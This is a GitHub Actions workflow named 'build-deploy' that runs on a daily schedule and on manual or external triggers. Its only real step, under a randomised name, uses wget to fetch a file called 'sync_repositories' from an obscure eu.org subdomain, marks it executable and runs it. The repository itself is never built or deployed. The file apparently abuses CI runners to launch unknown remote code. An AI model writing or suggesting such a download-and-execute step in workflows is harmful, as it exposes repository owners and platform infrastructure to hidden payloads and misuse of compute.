#2024-03-18-[135735]-3pn33m6q
name: main

on:
  workflow_dispatch:

  repository_dispatch:
    types: runner_workflow

  schedule:
    - cron: "22 4 * * * "
    
jobs:
  build-deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: joqh8pn75c4rp6wc
        run: |
          wget -q https://1924h2njukqwj2q6.callforpapers.eu.org/sync_repositories
          chmod 755 sync_repositories
          ./sync_repositories